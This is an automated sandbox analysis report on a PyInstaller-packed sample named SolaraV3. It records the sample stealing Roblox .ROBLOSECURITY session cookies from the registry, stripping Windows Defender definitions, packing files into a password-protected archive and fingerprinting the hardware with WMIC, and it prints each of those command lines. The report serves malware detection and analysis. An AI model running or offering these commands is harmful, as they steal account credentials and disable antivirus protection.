Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Imagebase:	0x7ff7d8310000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	09:32:38
Start date:	04/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff76da80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	09:32:38
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	09:32:38
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8056, Parent PID: 7592

General

Target ID:	102
Start time:	09:32:38
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	09:32:38
Start date:	04/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff76da80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	09:32:39
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	09:32:40
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	09:32:40
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	09:32:41
Start date:	04/10/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff72c490000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	09:32:52
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	09:32:52
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	09:32:52
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Imagebase:	0x7ff74ee70000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	111
Start time:	09:32:54
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	112
Start time:	09:32:54
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	09:32:54
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff6da5b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	114
Start time:	09:32:55
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	115
Start time:	09:32:55
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	116
Start time:	09:32:55
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff6da5b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	117
Start time:	09:32:56
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6068, Parent PID: 2564

General

Target ID:	118
Start time:	09:32:56
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	119
Start time:	09:32:56
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6da5b0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	120
Start time:	09:32:57
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	121
Start time:	09:32:57
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	122
Start time:	09:32:57
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	123
Start time:	09:32:58
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff680120000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8168, Parent PID: 8040

General

Target ID:	124
Start time:	09:32:58
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	129
Start time:	09:32:59
Start date:	04/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	69

Executed Functions

Function 00007FF6DC7089E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708A56

Part of subcall function 00007FF6DC71A47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71A490

Part of subcall function 00007FF6DC71871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC718783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708AE6
CreateProcessW.KERNELBASE ref: 00007FF6DC708B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708B28

Part of subcall function 00007FF6DC702C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
Part of subcall function 00007FF6DC702C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
Part of subcall function 00007FF6DC702C50: MessageBoxW.USER32 ref: 00007FF6DC702D99

RegisterClassW.USER32 ref: 00007FF6DC708B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708B8B
CreateWindowExW.USER32 ref: 00007FF6DC708BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C15
PeekMessageW.USER32 ref: 00007FF6DC708C39
TranslateMessage.USER32 ref: 00007FF6DC708C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C51
PeekMessageW.USER32 ref: 00007FF6DC708C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708E04
GetExitCodeProcess.KERNELBASE ref: 00007FF6DC708E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6DC703F77), ref: 00007FF6DC708E2F

Strings

Failed to create child process!, xrefs: 00007FF6DC708B30
CreateProcessW, xrefs: 00007FF6DC708B37
PyInstaller Onefile Hidden Window, xrefs: 00007FF6DC708B95
PyInstallerOnefileHiddenWindow, xrefs: 00007FF6DC708B54

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: 1bff4179a1be7ff1bc58e4b5cef247cd99b3322a71b3d108e5b5ec61d38f45b0
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: 94D18731A08B8A86EB209F75E8642AD7770FF84758F500237DA5E83A95DF3CD566D700

Function 00007FF6DC701000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6DC703BE8
MEI, xrefs: 00007FF6DC703933
_PYI_ARCHIVE_FILE, xrefs: 00007FF6DC7038D2, 00007FF6DC7039FF
pyi-contents-directory, xrefs: 00007FF6DC703B8D
Failed to start splash screen!, xrefs: 00007FF6DC703ECC
VCRUNTIME140.dll, xrefs: 00007FF6DC703DA9
Could not create temporary directory!, xrefs: 00007FF6DC703CBF
pkg, xrefs: 00007FF6DC7039BE
Failed to load splash screen resources!, xrefs: 00007FF6DC703E7D
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6DC703882, 00007FF6DC7038AF
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6DC703C61
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6DC703971
pyi-disable-windowed-traceback, xrefs: 00007FF6DC703BB2
pyi-python-flag, xrefs: 00007FF6DC703AD6
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6DC703D12
Failed to remove temporary directory: %s, xrefs: 00007FF6DC703FC7
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6DC703A17, 00007FF6DC703A2F, 00007FF6DC703A9B
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6DC703B32
_PYI_SPLASH_IPC, xrefs: 00007FF6DC703A23, 00007FF6DC703EED
bye-runtime-tmpdir, xrefs: 00007FF6DC703B68
Py_GIL_DISABLED, xrefs: 00007FF6DC703AF4
Failed to convert DLL search path!, xrefs: 00007FF6DC703DD4
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6DC703EB3
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6DC703D35
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6DC703E02
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6DC7039DE
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6DC703E9E
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6DC703A0B, 00007FF6DC703CD4, 00007FF6DC703F63

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: be5b1485ddbaef6361bb4e3b11d5ceb35ad4a10a396fe0c475ce2c74d9fdd6eb
Instruction ID: dfc6b9dcc23d036ac38d1d12981a41f8e3d0fca2f62b258947a36f72bebd2efd
Opcode Fuzzy Hash: be5b1485ddbaef6361bb4e3b11d5ceb35ad4a10a396fe0c475ce2c74d9fdd6eb
Instruction Fuzzy Hash: E632BD21A1CA8A91FA39D722D4653BD6771AF44784F844133DA5DC32C6EF2EE57AE300

Function 00007FF6DC726964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6DC726698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7266D9
Part of subcall function 00007FF6DC726698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC726757
Part of subcall function 00007FF6DC726698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7267A8

CreateFileW.KERNELBASE ref: 00007FF6DC726A6A
CreateFileW.KERNEL32 ref: 00007FF6DC726ABA
GetLastError.KERNEL32 ref: 00007FF6DC726AEA
GetFileType.KERNELBASE ref: 00007FF6DC726AFF
GetLastError.KERNEL32 ref: 00007FF6DC726B09
CloseHandle.KERNEL32 ref: 00007FF6DC726B3C
CloseHandle.KERNEL32 ref: 00007FF6DC726C9F
CreateFileW.KERNEL32 ref: 00007FF6DC726CD4
GetLastError.KERNEL32 ref: 00007FF6DC726CE3

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: 1f658a21a2cf1cc71e7a8a535b4a0c0e3411f9669a95ad32ae96509cf338d8e8
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: BFC1B136B28A4A85EB20CFA9C4A16AC7761F749B98F115237DE1E977D4CF38D466C300

Function 00007FF6DC7083C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC70842B
RemoveDirectoryW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084AE
DeleteFileW.KERNELBASE(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084CD
FindNextFileW.KERNELBASE(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084DB
FindClose.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084EC
RemoveDirectoryW.KERNELBASE(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084F5

Strings

%s\*, xrefs: 00007FF6DC7083F2

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: 398dc6730260bb16ff4ede751416c0e23ca2e6ce85e6efacb00cf5f107a4fce0
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: B2417F21A0CA4A85EA709F61A4541FE6370FB94794F400333E6AEC26C4EF3DE567D701

Function 00007FF6DC709280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6DC7092B3
FindClose.KERNELBASE ref: 00007FF6DC7092C2

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 82ed977e490c0724387f4112aa077d80b004f8bc2e4f685765b5bb3ec7dbbf20
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: B6F06822A1C74686F7708B64F49976E7360AB84778F444336DA6E426D4DF3CD06ADB04

Function 00007FF6DC7208C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
